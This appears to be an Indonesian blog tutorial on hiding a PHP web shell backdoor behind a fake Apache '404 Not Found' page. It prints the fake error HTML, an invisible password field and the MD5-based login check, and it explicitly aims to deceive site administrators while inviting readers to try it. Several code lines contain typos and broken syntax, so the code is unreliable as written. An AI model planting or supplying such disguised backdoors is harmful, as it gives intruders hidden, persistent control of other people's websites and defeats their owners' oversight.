Untuk lebih memahami beberapa response HTTP anda bisa membaca sendiri list of HTTP Status di http://www.w3.org/protocolsrfc2616/rfc2616-sec10.html atau kalau yang bahasanya indonesia nya di http://logcode.net/content/list-http-status-code
Gambar 01. Halaman 404 Not Found
Tampilan halaman 404 Not found ini dapat kita gunakan untuk mengecoh admin, mengecoh admin ? Maksudnya ? Maksudnya adalah membuat backdoor yang tampilannya 404 Not Found namun Jika di Grepe-grepe ( njir bahasanya grepe2.. awas kata emak GREPE2 ADALAH KEHAMILAN YANG TERTUNDA ckckckck ) maksudnya raba - raba di bagian tengahnya terdapat lubang jiahhh lubang, colom maksudnya, untuk menulis Password yang di gunakan sebagai authentifikasi pemilik backdoor
Gambar 02. Webshell dengan kamuflase 404 Not Found
Daftarkan dulu variable yang digunakan sebagai user dan password, dalam konteks ini $auth_pass dalam Bentuk MD5
$auth_pass = "cd1695065338d553fda15df154794900";
Fungsi print login apabila password salah maka yang keluar adalah halaman login
funcion printLogin () {
?>
<1> Not Found</h1>
<p>The request URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER[ 'HTTP_HOST' ] ?> Port 80 </address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff: }
</style><center>
<form methos=post>
<input type=password name=pass>
</form></center>
<?php
Untuk Proses passwordnya :
"if( !isset(
$SESSION[md5($_SERVER[ ' HTTP_HOST' ])] ))
if ( empty ( $auth_pass ) | |
( isset($_POST['pass'] ) && (
md5 ($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER ['HTTP_HOST'] ) ] =
true;
else
printLogin ();
fungsi if diatas adalah "JIKA PASSWORD (pass) SAMADENGAN variabel MD5 pass ($auth_pass) MAKA $_SESSION LOGIN BERNILAI TRUE.
Selamat Mencoba ! Good Luck !
Sekian dari saya, bila ada salah kata mohon di maafkan ^_^
